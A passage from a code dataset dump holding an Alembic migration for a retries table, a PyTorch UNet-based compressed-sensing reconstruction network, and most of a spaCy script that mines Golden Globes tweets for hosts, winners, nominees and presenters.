used by Alembic.\nrevision = '0704901102eb'\ndown_revision = '5cebc0f48f6e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table(\n 'tx_retries', sa.Column('id', sa.Integer, primary_key=True),\n sa.Column('order_id', sa.Integer, sa.ForeignKey('orders.id')),\n sa.Column('last_attempt', sa.DateTime),\n sa.Column('retry_count', sa.Integer, default=0),\n sa.Column('region_code', sa.Integer),\n sa.Column('pending', sa.Boolean, default=True),\n sa.Column('created_at', sa.DateTime, default=sa.func.now()))\n\n\ndef downgrade():\n op.drop_table('tx_retries')\n","repo_name":"Blockstream/satellite-api","sub_path":"server/alembic/versions/0704901102eb_add_tx_retries_table.py","file_name":"0704901102eb_add_tx_retries_table.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"72"} +{"seq_id":"21098508407","text":"import math\r\nimport torch\r\nimport numpy as np\r\nimport torch.nn as nn\r\nfrom torch.nn import init\r\nfrom itertools import repeat\r\nimport torch.nn.functional as F\r\n# from torch._six import container_abcs\r\nimport collections.abc as container_abcs\r\nfrom torch.nn.modules.module import Module\r\nfrom .layers import unetConv2, unetUp\r\nfrom utils.util import init_weights, count_param\r\nimport models\r\n\r\n\r\ndef _ntuple(n):\r\n def parse(x):\r\n if isinstance(x, container_abcs.Iterable): # isinstance():判断两个类型是否相同\r\n return x\r\n return tuple(repeat(x, n))\r\n return parse\r\n\r\n\r\n_pair = _ntuple(2)\r\n\r\n\r\nclass UNet(nn.Module):\r\n\r\n def __init__(self, in_channels=1, n_classes=1, feature_scale=2, is_deconv=True, is_batchnorm=True):\r\n super(UNet, self).__init__()\r\n self.in_channels = in_channels\r\n self.feature_scale = feature_scale\r\n self.is_deconv = is_deconv\r\n self.is_batchnorm = is_batchnorm\r\n\r\n filters = [32, 64, 128, 256]\r\n\r\n # downsampling\r\n self.maxpool = nn.MaxPool2d(kernel_size=2)\r\n self.conv1 = unetConv2(self.in_channels, filters[0], self.is_batchnorm)\r\n self.conv2 = unetConv2(filters[0], filters[1], self.is_batchnorm)\r\n self.conv3 = unetConv2(filters[1], filters[2], self.is_batchnorm)\r\n self.center = unetConv2(filters[2], filters[3], self.is_batchnorm)\r\n # upsampling\r\n self.up_concat3 = unetUp(filters[3], filters[2], self.is_deconv)\r\n self.up_concat2 = unetUp(filters[2], filters[1], self.is_deconv)\r\n self.up_concat1 = unetUp(filters[1], filters[0], self.is_deconv)\r\n # final conv (without any concat)\r\n self.final = nn.Conv2d(filters[0], n_classes, 1)\r\n\r\n # initialise weights\r\n for m in self.modules():\r\n if isinstance(m, nn.Conv2d):\r\n init_weights(m, init_type='kaiming')\r\n elif isinstance(m, nn.BatchNorm2d):\r\n init_weights(m, init_type='kaiming')\r\n\r\n def forward(self, inputs):\r\n conv1 = self.conv1(inputs) # 16*512*512\r\n maxpool1 = self.maxpool(conv1) # 16*256*256\r\n\r\n conv2 = self.conv2(maxpool1) # 32*256*256\r\n maxpool2 = self.maxpool(conv2) # 32*128*128\r\n\r\n conv3 = self.conv3(maxpool2) # 64*128*128\r\n maxpool3 = self.maxpool(conv3) # 64*64*64\r\n\r\n center = self.center(maxpool3) # 256*32*32\r\n up3 = self.up_concat3(center, conv3) # 64*128*128\r\n up2 = self.up_concat2(up3, conv2) # 32*256*256\r\n up1 = self.up_concat1(up2, conv1) # 16*512*512\r\n\r\n final = self.final(up1)\r\n\r\n return final\r\n\r\n\r\nclass Conv(Module):\r\n def __init__(self, config, ic, oc):\r\n super(Conv, self).__init__()\r\n self.config = config\r\n self.ic = ic\r\n self.oc = oc\r\n self.w = nn.Parameter(torch.Tensor(oc, ic, 9))\r\n self.padding = _pair(1)\r\n self.init = nn.Parameter(torch.zeros([ic, 9, 9], dtype=torch.float32))\r\n init.kaiming_uniform_(self.w, a=math.sqrt(5)) # Kaiming均匀初始化\r\n\r\n def forward(self, inputs):\r\n # torch.eye(n):生成对角线全1,其余部分全0的二维数组\r\n # torch.einsum用于矩阵乘法\r\n init = self.init + torch.eye(9, dtype=torch.float32).unsqueeze(0).repeat((self.ic, 1, 1)).to(self.config.device)\r\n weight = torch.reshape(torch.einsum('abc, dac->dab', init, self.w), (self.oc, self.ic, 3, 3))\r\n outputs = F.conv2d(inputs, weight, None, 1, self.padding)\r\n return outputs\r\n\r\n\r\nclass pre_layer(nn.Module):\r\n def __init__(self, config):\r\n super(pre_layer, self).__init__()\r\n\r\n self.unet = UNet()\r\n\r\n\r\n def forward(self, x_recon):\r\n\r\n x_recon = torch.transpose(x_recon, 0, 1).reshape([-1, 1, 32, 32]) # [9,1024]->[9,1,32,32]\r\n x_output = self.unet(x_recon)\r\n\r\n x_output = torch.transpose(x_output.reshape(-1, 1024), 0, 1) # [1024,9]\r\n return x_output\r\n\r\n\r\nclass post_layer(nn.Module):\r\n def __init__(self, config):\r\n super(post_layer, self).__init__()\r\n\r\n self.unet = UNet()\r\n\r\n self.conv_out = nn.Sequential(\r\n nn.ReLU(),\r\n Conv(config, 32, 32),\r\n Conv(config, 32, 32),\r\n Conv(config, 32, 1),\r\n )\r\n\r\n def forward(self, x_recon):\r\n x_output = self.unet(x_recon)\r\n return x_output\r\n\r\n\r\nclass HybridNet(nn.Module):\r\n def __init__(self, config):\r\n super(HybridNet, self).__init__()\r\n self.config = config\r\n self.phi_size = 32\r\n points = self.phi_size ** 2\r\n phi_init = np.random.normal(0.0, (1 / points) ** 0.5, size=(int(config.ratio * points), points)) # 从正太/高斯分布中随机抽取样本\r\n self.phi = nn.Parameter(torch.from_numpy(phi_init).float(), requires_grad=False)\r\n self.Q = nn.Parameter(torch.from_numpy(np.transpose(phi_init)).float(), requires_grad=False)\r\n\r\n self.num_layers = 6\r\n self.pre_block = nn.ModuleList()\r\n for i in range(self.num_layers):\r\n self.pre_block.append(pre_layer(config))\r\n\r\n self.post_block = nn.ModuleList()\r\n for i in range(self.num_layers):\r\n self.post_block.append(post_layer(config))\r\n\r\n self.threshold = nn.Parameter(torch.Tensor([0.01]), requires_grad=False)\r\n self.weights = []\r\n self.etas = []\r\n self.alphas = []\r\n self.betas = []\r\n\r\n alp = 0.9\r\n bet = 0.8\r\n\r\n for i in range(self.num_layers):\r\n self.weights.append(nn.Parameter(torch.tensor(1.), requires_grad=False))\r\n self.register_parameter(\"eta_\" + str(i + 1), nn.Parameter(torch.tensor(0.1), requires_grad=False)) # todo\r\n self.etas.append(eval(\"self.eta_\" + str(i + 1)))\r\n self.register_parameter(\"alpha_\" + str(i + 1), nn.Parameter(torch.tensor(alp), requires_grad=False)) # todo\r\n self.alphas.append(eval(\"self.alpha_\" + str(i + 1)))\r\n self.register_parameter(\"beta_\" + str(i + 1), nn.Parameter(torch.tensor(bet), requires_grad=False)) # todo\r\n self.betas.append(eval(\"self.beta_\" + str(i + 1)))\r\n\r\n def forward(self, inputs):\r\n batch_size = inputs.size(0) # inputs [1,1,96,96]\r\n # inputs = torch.unsqueeze(inputs,0) # complex\r\n y = self.sampling(inputs, self.phi_size)\r\n recon = self.recon(y, self.phi_size, batch_size) # inputs [1,1,96,96]\r\n return recon\r\n\r\n def sampling(self, inputs, init_block):\r\n inputs = torch.cat(torch.split(inputs, split_size_or_sections=init_block, dim=3), dim=0)\r\n inputs = torch.cat(torch.split(inputs, split_size_or_sections=init_block, dim=2), dim=0)\r\n inputs = torch.reshape(inputs, [-1, init_block ** 2])\r\n inputs = torch.transpose(inputs, 0, 1)\r\n y = torch.matmul(self.phi, inputs)\r\n return y\r\n\r\n def recon(self, y, init_block, batch_size):\r\n idx = int(self.config.block_size / init_block)\r\n\r\n recon = torch.matmul(self.Q, y) #[1024,9]\r\n xp = recon\r\n x = recon\r\n for i in range(self.num_layers):\r\n if i != 0:\r\n x = (1-self.alphas[i]) * xp + (self.alphas[i]-self.betas[i]) * recon\r\n xp = recon\r\n recon = recon - self.weights[i] * torch.mm(torch.transpose(self.phi, 0, 1), (torch.mm(self.phi, recon) - y))\r\n recon = recon - self.pre_block[i](recon) # [1024,9]\r\n recon = torch.reshape(torch.transpose(recon, 0, 1), [-1, 1, init_block, init_block]) # [9,1,32,32]\r\n recon = torch.mul(torch.sign(recon), F.relu(torch.abs(recon) - self.threshold))\r\n recon = recon - self.post_block[i](recon)\r\n recon = torch.reshape(recon, [-1, init_block ** 2])\r\n recon = torch.transpose(recon, 0, 1) # [1024,9]\r\n\r\n if i != 0:\r\n recon = x + self.betas[i] * recon\r\n\r\n\r\n recon = torch.reshape(torch.transpose(recon, 0, 1), [-1, 1, init_block, init_block]) # [9,1,32,32]\r\n recon = torch.cat(torch.split(recon, split_size_or_sections=idx * batch_size, dim=0), dim=2) #[3,1,96,32]\r\n recon = torch.cat(torch.split(recon, split_size_or_sections=batch_size, dim=0), dim=3) #[1,1,96,96]\r\n return recon\r\n\r\n","repo_name":"ICSResearch/LTwIST","sub_path":"models/demo_unet.py","file_name":"demo_unet.py","file_ext":"py","file_size_in_byte":8292,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"19510604187","text":"import copy\nimport json\nimport re\nimport spacy\nimport sys\nimport time\nfrom difflib import SequenceMatcher\nfrom spacy.tokenizer import Tokenizer\n\nOFFICIAL_AWARDS_1315 = ['cecil b. demille award', 'best motion picture - drama',\n 'best performance by an actress in a motion picture - drama',\n 'best performance by an actor in a motion picture - drama',\n 'best motion picture - comedy or musical',\n 'best performance by an actress in a motion picture - comedy or musical',\n 'best performance by an actor in a motion picture - comedy or musical',\n 'best animated feature film', 'best foreign language film',\n 'best performance by an actress in a supporting role in a motion picture',\n 'best performance by an actor in a supporting role in a motion picture',\n 'best director - motion picture', 'best screenplay - motion picture',\n 'best original score - motion picture', 'best original song - motion picture',\n 'best television series - drama',\n 'best performance by an actress in a television series - drama',\n 'best performance by an actor in a television series - drama',\n 'best television series - comedy or musical',\n 'best performance by an actress in a television series - comedy or musical',\n 'best performance by an actor in a television series - comedy or musical',\n 'best mini-series or motion picture made for television',\n 'best performance by an actress in a mini-series or motion picture made for television',\n 'best performance by an actor in a mini-series or motion picture made for television',\n 'best performance by an actress in a supporting role in a series, mini-series or motion picture made for television',\n 'best performance by an actor in a supporting role in a series, mini-series or motion picture made for television']\nOFFICIAL_AWARDS_1819 = ['best motion picture - drama', 'best motion picture - musical or comedy',\n 'best performance by an actress in a motion picture - drama',\n 'best performance by an actor in a motion picture - drama',\n 'best performance by an actress in a motion picture - musical or comedy',\n 'best performance by an actor in a motion picture - musical or comedy',\n 'best performance by an actress in a supporting role in any motion picture',\n 'best performance by an actor in a supporting role in any motion picture',\n 'best director - motion picture', 'best screenplay - motion picture',\n 'best motion picture - animated', 'best motion picture - foreign language',\n 'best original score - motion picture', 'best original song - motion picture',\n 'best television series - drama', 'best television series - musical or comedy',\n 'best television limited series or motion picture made for television',\n 'best performance by an actress in a limited series or a motion picture made for television',\n 'best performance by an actor in a limited series or a motion picture made for television',\n 'best performance by an actress in a television series - drama',\n 'best performance by an actor in a television series - drama',\n 'best performance by an actress in a television series - musical or comedy',\n 'best performance by an actor in a television series - musical or comedy',\n 'best performance by an actress in a supporting role in a series, limited series or motion picture made for television',\n 'best performance by an actor in a supporting role in a series, limited series or motion picture made for television',\n 'cecil b. demille award']\n\nnlp = spacy.load('en_core_web_sm')\nner = spacy.load('en_core_web_sm', disable=['parser', 'tagger'])\ntokenizer = Tokenizer(nlp.vocab)\ncustom_stop_words = [\n 'Golden Globes', 'goldenglobes', '@', 'golden globes', 'RT', 'GoldenGlobes', '\\n', '#', '#GoldenGlobes', 'gg',\n 'Golden Globe.', 'Golden Globe', 'golden globe', '@goldenglobes', '@GG', '@gg', '#goldenglobes', '#gg', '#GG',\n 'Golden Globes.', '@GoldenGlobes', 'tonight', 'this year', 'last year', 'next year', 'the golden globes',\n 'The Golden Globes', 'the goldenglobes', 'the GoldenGlobes', 'The goldenglobes', 'The GoldenGlobes',\n 'the Golden Globes', 'The golden globes', 'rt', 'golden', 'Golden', 'globes', 'Globes', 'GoldenGlobe', 'the year',\n 'Globe', 'globe', 'award', 'awards', 'Awards', 'Award', 'goldenglobe']\n\n\ndef get_first_and_last(hosts, index):\n name = hosts[index]\n split_name = name.split(' ')\n if len(split_name) >= 2:\n return name # return name if already two or more parts\n count = 1\n if index < 0:\n limit = len(hosts) + index + 1\n else:\n limit = index + 1\n max_limit = 5 # max number of additional names to check\n while count < min(limit, max_limit):\n next_name = hosts[index-count]\n split_next_name = next_name.split(' ')\n if split_next_name[0] == split_name[0]:\n return next_name\n count += 1\n return name\n\n\ndef find_dressed(dressed, tweet, key_words):\n names = find_names(tweet, key_words)\n if not names:\n return\n for token in tweet:\n word = token.text.lower()\n if word == 'beauty' or word == 'pretty' or word == 'gorgeous' or word == 'best' or word == 'fashionista':\n for person in names:\n dressed['best'].append(person)\n break\n if ((word == 'ugly' or word == 'ew' or word == 'bad' or word == 'terrible' or word == 'worst'\n or word == 'gross' or word == 'awful')):\n for person in names:\n dressed['worst'].append(person)\n break\n\n\ndef find_hosts(unique_hosts, counts):\n hosts = []\n if not unique_hosts:\n return hosts\n first_host = get_first_and_last(unique_hosts, -1) # make sure to find the first and last name\n split_first_host = first_host.split(' ')\n first_host_count = counts[-1]\n hosts.append(first_host)\n # if the second highest name doesn't have the same first name and is within a percentage, add it as well\n count = 1\n limit = 10 # max number of additional potential hosts to check\n similarity_coefficient = 0.6\n while count < min(len(unique_hosts), limit):\n name = get_first_and_last(unique_hosts, -1-count)\n split_name = name.split(' ')\n similarity = counts[-1-count] / first_host_count\n if split_name[0] != split_first_host[0] and similarity > similarity_coefficient:\n hosts.append(name)\n break\n count += 1\n return hosts\n\n\ndef get_hosts(year):\n '''Hosts is a list of one or more strings. Do NOT change the name\n of this function or what it returns.'''\n answer = load_data('answer' + str(year) + '.json')\n hosts = answer['hosts']\n return hosts\n\n\ndef find_awards(unique_awards, counts):\n if len(unique_awards) > 26:\n awards = unique_awards[-26:][::-1]\n else:\n awards = unique_awards[::-1]\n return awards\n\n\ndef get_awards(year):\n '''Awards is a list of strings. Do NOT change the name\n of this function or what it returns.'''\n answer = load_data('answer' + str(year) + '.json')\n awards = answer['awards']\n return awards\n\n\ndef find_nominees(year, unique_nominees, counts, winners):\n nominees = {}\n official_awards = get_awards_by_year(year)\n for award in official_awards:\n nom_list = []\n mentions = counts[award]\n award_noms = unique_nominees[award]\n if len(mentions) > 1:\n if (mentions[-1] / 2) >= mentions[-2]: # and mentions[-1] > 4:\n cutoff = mentions[-2] / 2\n else:\n cutoff = mentions[-1] / 2\n for i in range(1, len(mentions)):\n sim_flag = False\n if mentions[-i] >= cutoff:\n curr_nom = award_noms[-i]\n split_name = curr_nom.split(' ')\n if not award_noms[-i] == winners[award]:\n for nom in nom_list:\n if SequenceMatcher(None, nom, curr_nom).ratio() >= 0.8:\n sim_flag = True\n split = nom.split(' ')\n for word in split:\n for new_word in split_name:\n if SequenceMatcher(None, new_word, word).ratio() >= 0.85:\n sim_flag = True\n if not sim_flag:\n nom_list.append(award_noms[-i])\n else:\n break\n elif award_noms:\n nom_list.append(award_noms[-1])\n nominees[award] = nom_list\n return nominees\n\n\ndef get_nominees(year):\n '''Nominees is dictionary with the hard coded award\n names as keys, and each entry a list of strings. Do NOT change\n the name of this function or what it returns.'''\n answer = load_data('answer' + str(year) + '.json')\n award_data = answer['award_data']\n nominees = {}\n for award in award_data.keys():\n nominees[award] = award_data[award][0]\n return nominees\n\n\ndef nom_filter(tweet, key_words):\n nom_list = []\n for ent in tweet.ents:\n if not ent_filter(ent):\n continue\n ignore_flag = False\n nom = re.sub(r'[^A-Za-z ]+', '', ent.text) # remove any characters that are not alphabetic or a space\n if ((not nom or nom[0] == ' ' or nom[-1] == ' ' or nom[0].islower() or nom.lower() in custom_stop_words\n or nom.strip(' ').lower() in custom_stop_words)):\n continue\n for word in nom.split(' '):\n if word.lower() in custom_stop_words or word.lower() in key_words:\n ignore_flag = True\n if not ignore_flag and not (nom == '' or nom == ' '):\n nom_list.append(nom)\n return nom_list\n\n\ndef find_winners(year, unique_winners):\n official_awards = get_awards_by_year(year)\n winners = {}\n # get winners\n for award in official_awards:\n award_winners = unique_winners[award]\n if not award_winners:\n winners[award] = None\n else:\n winners[award] = award_winners[-1]\n return winners\n\n\ndef get_winner(year):\n '''Winners is a dictionary with the hard coded award\n names as keys, and each entry containing a single string.\n Do NOT change the name of this function or what it returns.'''\n answer = load_data('answer' + str(year) + '.json')\n award_data = answer['award_data']\n winners = {}\n for award in award_data.keys():\n winners[award] = award_data[award][1]\n return winners\n\n\ndef find_presenters(year, unique_presenters, counts):\n official_awards = get_awards_by_year(year)\n presenters = {}\n similarity_coefficient = 0.9\n # get presenters\n for award in official_awards:\n award_presenters = unique_presenters[award]\n if len(award_presenters) == 0:\n presenters[award] = []\n else:\n first_presenter = award_presenters[-1]\n first_presenter_count = counts[award][-1]\n presenters[award] = [first_presenter]\n count = 1\n limit = 2 # set max number of potential presenters\n while count < min(len(award_presenters), limit):\n presenter = award_presenters[-1-count]\n if (counts[award][-1-count] / first_presenter_count) > similarity_coefficient:\n presenters[award].append(presenter)\n count += 1\n return presenters\n\n\ndef get_presenters(year):\n '''Presenters is a dictionary with the hard coded award\n names as keys, and each entry a list of strings. Do NOT change the\n name of this function or what it returns.'''\n answer = load_data('answer' + str(year) + '.json')\n award_data = answer['award_data']\n presenters = {}\n for award in award_data.keys():\n presenters[award] = award_data[award][2]\n return presenters\n\n\ndef pre_ceremony():\n '''This function loads/fetches/processes any data your program\n will use, and stores that data in your DB or in a json, csv, or\n plain text file. It is the first thing the TA will run when grading.\n Do NOT change the name of this function or what it returns.'''\n print('Starting pre-ceremony now...')\n tweets = {}\n for year in range(2000, 2020):\n try:\n # print('Checking for ' + str(year) + ' data')\n data = load_data('gg' + str(year) + '.json')\n tweets[year] = extract_text(data)\n # print('Found ' + str(year) + ' data')\n except:\n pass\n # print(str(year) + ' data not found')\n for year in tweets.keys():\n with open('processed_gg' + str(year) + '.json', 'w') as f:\n json.dump(tweets[year], f)\n print('Pre-ceremony complete')\n return\n\n\n# load json file as dictionary, eg. 'gg20XX.json'\ndef load_data(file_name):\n with open(file_name, 'r') as f:\n data = json.load(f)\n return data\n\n\ndef extract_text(tweets):\n tweet_text = []\n filtered_tweets = copy.deepcopy(tweets)\n for tweet in filtered_tweets:\n if tweet['text'][0:2].lower() != 'rt': # exclude retweets\n tweet_text.append(tweet['text'])\n return tweet_text\n\n\n# return True if we want to append token, otherwise False\ndef token_filter(token):\n return not (token.is_punct or token.is_space or token.is_stop or len(token.text) <= 3 or '@' in token.text\n or '#' in token.text or 'http' in token.text)\n\n\n# return True if we want to append entity, otherwise False\ndef ent_filter(ent):\n return not (ent.text.lower() in custom_stop_words or '@' in ent.text or '#' in ent.text or 'http' in ent.text)\n\n\ndef get_awards_by_year(year):\n if year > 2018:\n return OFFICIAL_AWARDS_1819\n return OFFICIAL_AWARDS_1315\n\n\ndef find_award(year, tweet):\n official_awards = get_awards_by_year(year)\n best_match = ''\n best = 0 # must have at least one significant word in common\n official_tokens = tokenizer.pipe(official_awards)\n for award in official_tokens:\n temp = 0\n for award_token in award:\n # if award_token.lower == 'best' or award_token.is_stop: # exclude shared and insignificant words\n # continue\n for tweet_token in tweet:\n if award_token.lower == tweet_token.lower:\n temp += 1\n break\n elif award_token.lower == 'television' and tweet_token.lower == 'tv':\n temp += 1\n break\n elif award_token.lower == 'picture' and (tweet_token.lower == 'film' or tweet_token.lower == 'movie'):\n temp += 1\n break\n if temp > best:\n best = temp\n best_match = award.text\n return best_match\n\n\n# can generalize this function to find names with any number of parts, eg. John Doe = 2, A Great Movie = 3\n# then we can use it to find the names of movies as well as people whose names are more than 2 parts\ndef find_names(tweet, key_words):\n text = tweet.text\n pattern = r'([A-Z][a-z]+ [A-Z][a-z]+)' # regex pattern to find capitalized two-part names\n matches = re.findall(pattern, text)\n names = []\n for match in matches:\n if match.lower() in custom_stop_words:\n continue\n split = match.split(' ')\n ignore_flag = False\n for word in split:\n if nlp.vocab[word.lower()].is_stop or word.lower() in key_words: # ignore potential names that share words with the official awards list\n ignore_flag = True\n break\n if not ignore_flag:\n names.append(match)\n return names\n\n\n# serializes answer dict for access in get functions\ndef form_answer(year, hosts, awards, nominees, winners, presenters):\n official_awards = get_awards_by_year(year)\n answer = {}\n answer['hosts'] = hosts\n answer['awards'] = awards\n answer['award_data'] = {}\n for award in official_awards:\n answer['award_data'][award] = [nominees[award], winners[award], presenters[award]]\n with open('answer' + str(year) + '.json', 'w') as f:\n json.dump(answer, f)\n print_answer(year, answer)\n\n\ndef print_answer(year, answer):\n official_awards = get_awards_by_year(year)\n file = open('readableanswer' + str(year) + '.txt', 'w')\n file.write('Hosts: ')\n for name in answer['hosts']:\n file.write(name + '; ')\n file.write('\\n\\n')\n for award in official_awards:\n file.write('Award: ' + award)\n nominees, winner, presenters = answer['award_data'][award]\n file.write('\\nPresenters: ')\n for name in presenters:\n file.write(name + '; ')\n file.write('\\nNominees: ')\n for name in nominees:\n file.write(name + '; ')\n if winner is None:\n winner = 'N/A'\n file.write('\\nWinner: ' + winner + '\\n\\n')\n file.close()\n # print results to console\n print('\\nHost(s):\\n')\n print(answer['hosts'])\n print('\\nAwards:\\n')\n for award in answer['awards']:\n print(award)\n print('\\nAward Data:\\n')\n for award in official_awards:\n print(award)\n nominees, winner, presenters = answer['award_data'][award]\n print('Nominees: ')\n print(nominees)\n print('Winner: ')\n print(winner)\n print('Presenter(s): ')\n print(presenters)\n print('')\n\n\ndef best_and_worst(year, best_dressed, worst_dressed, controversially_dressed):\n file = open('readableanswer' + str(year) + '.txt', 'a')\n file.write('Best Dressed: ' + best_dressed + '\\n')\n file.write('Worst Dressed: ' + worst_dressed + '\\n')\n file.write('Controversially Dressed: ' + controversially_dressed + '\\n')\n file.close()\n # print results to console\n print('Red Carpet:\\n')\n print('Best Dressed: ' + best_dressed)\n print('Worst Dressed: ' + worst_dressed)\n print('Controversially Dressed: ' + controversially_dressed)\n print('')\n\n\n# experimental phrase tree implementation, uses less memory when storing lists of strings with similar substrings\nclass WordNode:\n def __init__(self, word):\n self.word = word\n self.children = {}\n self.count = 0\n\n\ndef add_phrase(node, split_phrase):\n if len(split_phrase) == 0:\n node.count += 1 # iterate count if end of phrase\n return\n next_word = None\n for child_word in node.children.keys(): # if one of the remaining words is a child, continue down that path\n if child_word in split_phrase:\n next_word = child_word\n split_phrase.remove(next_word)\n add_phrase(node.children[next_word], split_phrase) # recurse with the word removed\n return\n if not next_word:\n next_word = split_phrase[0].lower()\n if nlp.vocab[next_word].is_stop:\n add_phrase(node, split_phrase[1:]) # recursively continue to add phrase with next word\n elif next_word in node.children.keys():\n add_phrase(node.children[next_word], split_phrase[1:]) # if path exists, recurse that way\n else:\n new_word_node = WordNode(next_word) # otherwise create new node\n node.children[next_word] = new_word_node\n add_phrase(new_word_node, split_phrase[1:]) # continue recursively adding phrase with new node\n\n\ndef get_phrases(node, prepend_str, award_names):\n if not prepend_str:\n new_prepend_str = node.word\n else:\n new_prepend_str = prepend_str + ' ' + node.word # add current node's word to current phrase\n if node.count > 0:\n award_names[new_prepend_str] = node.count # if complete phrase, add to dict\n for child in node.children.keys():\n get_phrases(node.children[child], new_prepend_str, award_names) # recurse on all children\n\n\ndef find_award_names(award_tree, tweet):\n text = tweet.text\n pattern = r'([Bb]est( [A-Za-z]+)+)'\n # aux_pattern = r'(\\-( [A-Za-z]+)+)' # for finding genres, possibly related entities\n matches = re.findall(pattern, text)\n # aux_matches = re.findall(aux_pattern, text)\n # aux_words = []\n # for aux_match in aux_matches:\n # aux_split = aux_match[0][2:].split(' ')\n # for word in aux_split:\n # if word.lower() in award_words: # if auxiliary words are common words in awards, append them\n # aux_words += aux_split\n # break\n for match in matches:\n split = match[0].split(' ')[1:] # + aux_words\n add_phrase(award_tree, split) # add phrase to phrase tree\n\n\ndef main():\n '''This function calls your program. Typing \"python gg_api.py\"\n will run this function. Or, in the interpreter, import gg_api\n and then run gg_api.main(). This is the second thing the TA will\n run when grading. Do NOT change the name of this function or what it returns.'''\n # pre_ceremony()\n print('Starting main now...')\n start_time = time.time()\n\n data = None\n data_year = None\n for year in range(2000, 2020):\n try:\n data = load_data('processed_gg' + str(year) + '.json')\n data_year = year\n # print('Using data for ' + str(year))\n break\n except:\n pass\n if not data:\n print('No processed data found, exiting program')\n sys.exit()\n\n potential_hosts = []\n award_tree = WordNode('best')\n award_names = {}\n noms_split = {'misc': []}\n winners_split = {'misc': []}\n presenters_split = {'misc': []}\n unique_noms = {}\n unique_winners = {}\n unique_presenters = {}\n noms_counts = {}\n winners_counts = {}\n presenters_counts = {}\n possible_presenters = {}\n possible_noms = {}\n possible_winners = {}\n dressed = {'best': [], 'worst': []}\n curr_award = 'misc' # take advantage of chronological ordering, keep track of what award is being talked about\n\n key_words = {'host', 'hosts', 'hosting', 'award', 'awards', 'awarding', 'awarded', 'nominate', 'nominates',\n 'nominating', 'nominated', 'nominee', 'win', 'wins', 'won', 'winner', 'present', 'presents',\n 'presenting', 'presented', 'accept', 'accepting', 'speech'} # only used in finding nominees, winners, and presenters!\n official_awards = get_awards_by_year(data_year)\n for award in official_awards:\n noms_split[award] = []\n winners_split[award] = []\n presenters_split[award] = []\n split = award.split(' ')\n for word in split:\n if len(word) > 1 and not nlp.vocab[word].is_stop:\n key_words.add(word) # populate list with significant words in award names\n\n for word in custom_stop_words:\n nlp.vocab[word].is_stop = True # additional custom stop words\n\n num_tweets = len(data) # total number of tweets\n n = 200000 # maximum number of tweets to check\n skip = int(num_tweets / n) # number of tweets to skip per selection\n if skip != 0:\n data = data[0::skip] # select n evenly spaced tweets from data\n tweets = ner.pipe(data, batch_size=50, n_threads=3)\n # check all tweets and extract necessary data in a single loop for better performance\n for tweet in tweets:\n tokens = []\n next_flag = False\n should_flag = False\n for token in tweet:\n t = token.lower\n if t == 'next': # flag tweets about next year\n next_flag = True\n continue\n if t == 'should': # flag opinion tweets\n should_flag = True\n continue\n if not token_filter(token):\n continue\n tokens.append(token.lemma_.lower())\n for index, token in enumerate(tokens): # enumeration can be used to check tokens in close proximity\n # find hosts\n if token == 'host' and not (next_flag and should_flag):\n for ent in tweet.ents: # store entities from spaCy's named entity recognizer\n if ent_filter(ent):\n potential_hosts.append(ent.text.lower())\n # break\n # find awards\n if token == 'best':\n # award_tweets.append(tweet)\n find_award_names(award_tree, tweet) # store potential award names in award name phrase tree\n # for ent in tweet.ents:\n # if len(ent.text) > 4 and ent.text[:4].lower() == 'best':\n # award_names.append(ent.text.lower())\n # break # just for performance while developing\n # find presenters\n if token == 'present':\n # presenter_tweets.append(tweet)\n a = find_award(data_year, tweet)\n if a != '':\n curr_award = a\n presenters_split[a] += find_names(tweet, key_words)\n else:\n presenters_split['misc'] += find_names(tweet, key_words)\n # break\n # find winners\n if ((token == 'win' or token == 'congrats' or token == 'congratulations' or token == 'accept'\n or token == 'speech')): # or token == 'congratulate', 'receive'\n # winner_tweets.append(tweet)\n a = find_award(data_year, tweet)\n if should_flag:\n if a != '':\n curr_award = a\n noms_split[a] += nom_filter(tweet, key_words)\n else:\n noms_split[curr_award] += nom_filter(tweet, key_words)\n else:\n if a != '':\n curr_award = a\n winners_split[a] += find_names(tweet, key_words)\n else:\n winners_split['misc'] += find_names(tweet, key_words)\n # break\n # find nominees\n if token == 'nominate' or token == 'nominee' or token == 'deserve' or token == 'lose' or token == 'rob':\n # nominee_tweets.append(tweet)\n a = find_award(data_year, tweet)\n if a != '':\n curr_award = a\n noms_split[a] += nom_filter(tweet, key_words)\n else:\n noms_split[curr_award] += nom_filter(tweet, key_words)\n # break\n if token == 'dress' or token == 'beauty' or token == 'pretty' or token == 'ugly' or token == 'fashion':\n find_dressed(dressed, tweet, key_words)\n # break\n if n == 0:\n break\n n -= 1\n\n # prepare potential hosts data\n unique_hosts = sorted(set(potential_hosts), key=potential_hosts.count)\n hosts_counts = [potential_hosts.count(host) for host in unique_hosts]\n # possible_hosts = list(zip(unique_hosts, hosts_counts))\n\n # prepare potential award names data\n award_tree.count = 0 # avoid considering 'best' as the name of an award in itself\n get_phrases(award_tree, '', award_names) # populate award names list with phrases from phrase tree\n unique_award_names = sorted(set(award_names.keys()), key=lambda x: award_names[x])\n awards_counts = [award_names[award_name] for award_name in unique_award_names]\n # possible_award_names = list(zip(unique_award_names, awards_counts))\n\n # prepare best/worst/controversially dressed data\n best_dressed = sorted(set(dressed['best']), key=dressed['best'].count)\n worst_dressed = sorted(set(dressed['worst']), key=dressed['worst'].count)\n controversially_dressed = 'N/A'\n diff = len(best_dressed) + len(worst_dressed)\n if best_dressed and worst_dressed:\n for i in range(1, len(best_dressed)):\n for j in range(1, len(worst_dressed)):\n if best_dressed[-i] == worst_dressed[-j] and diff > abs(i-j):\n diff = abs(i-j)\n controversially_dressed = best_dressed[-i]\n best_dressed = best_dressed[-1]\n worst_dressed = worst_dressed[-1]\n else:\n best_dressed = 'N/A'\n worst_dressed = 'N/A'\n\n # prepare nominee/winner/presenter data for each award\n for award in official_awards:\n unique_noms[award] = sorted(set(noms_split[award]), key=noms_split[award].count)\n unique_winners[award] = sorted(set(winners_split[award]), key=winners_split[award].count)\n presenters_split_set = set(presenters_split[award])\n if unique_winners[award]:\n winner_name = get_first_and_last(unique_winners[award], -1)\n if winner_name in presenters_split_set:\n presenters_split_set.remove(winner_name)\n unique_presenters[award] = sorted(presenters_split_set, key=presenters_split[award].count)\n noms_counts[award] = [noms_split[award].count(possible_nom) for possible_nom in unique_noms[award]]\n winners_counts[award] = [winners_split[award].count(possible_winner)\n for possible_winner in unique_winners[award]]\n 